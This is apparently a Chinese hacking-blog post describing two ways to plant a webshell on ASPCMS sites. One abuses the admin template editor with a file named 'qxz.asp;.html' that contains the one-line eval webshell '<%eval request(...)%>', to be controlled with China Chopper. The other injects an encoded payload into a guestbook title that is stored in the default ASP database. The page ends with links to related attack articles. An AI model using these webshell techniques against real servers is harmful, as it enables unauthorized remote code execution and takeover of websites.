aspcms后台拿shell的两种 ***

hacker4年前黑客文章1055

aspcms后台拿shell的两种 *** :

之一种:点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写qxz.asp;.html,
在文件内容写一句话
<%eval request(“qxz”)%>
然后点击添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话:qxz.asp;.html 点这个文件就会弹出插入一句话的页面,OK然后菜刀连接。

第二种:前台留言插入一句话,这个要默认数据库才可以使用,数据库默认配置为asp.目录在/data/data.asp下

在留言的标题处插入:┼攠數畣整爠煥敵瑳∨≡┩愾

标签: 黑客技术

相关文章

Webscan360的防御与绕过

Webscan360的防御与绕过

这两天给360做了一个webscan360的总结,结果补丁还没有出来,就被人公布到了91org上面,既然公开了,那我就做一个总结 首先我们贴上它最新的防御正则 \<.+javascr...

Dedecms某一处insert型注入

Dedecms某一处insert型注入

Dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的 漏洞需要会员,所以比较鸡肋啦! 发表文章处,post表单的mtypes...

NetStumbler应用比别的专用工具更积极主动的方式

NetStumbler应用比别的专用工具更积极主动的方式

什么叫NetStumbler? Netstumbler是用以搜索敞开式无线接入点的著名Windows专用工具之一。她们还派发了为PDA建立的WinCE版本号,并将其取名为MiniStumbler。N...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Beef? 电脑浏览器开发框架(Beef)是另一个很好的热门专业安全工器具。该专用工具将为网站渗透测试员发展技术性出示工作经验,与别的专用工具不一样,Beef致力于运用电脑浏览器系统漏洞来查验...

77种网站XSS跨站攻击脚本语法

XSS又叫CSS (Cross-Site Script) ,跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码 当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用...

怎样黑盒网站渗透测试取得一个网站的Webshell管理权限.

怎样黑盒网站渗透测试取得一个网站的Webshell管理权限.

假如你用心念完了我前三课的文章内容,这堂课我立即以一个我工作中的渗入案例来教你,怎样黑盒网站渗透测试取得一个网站的Webshell管理权限?   给新手的基本概念: 黑盒渗入,含意就是指...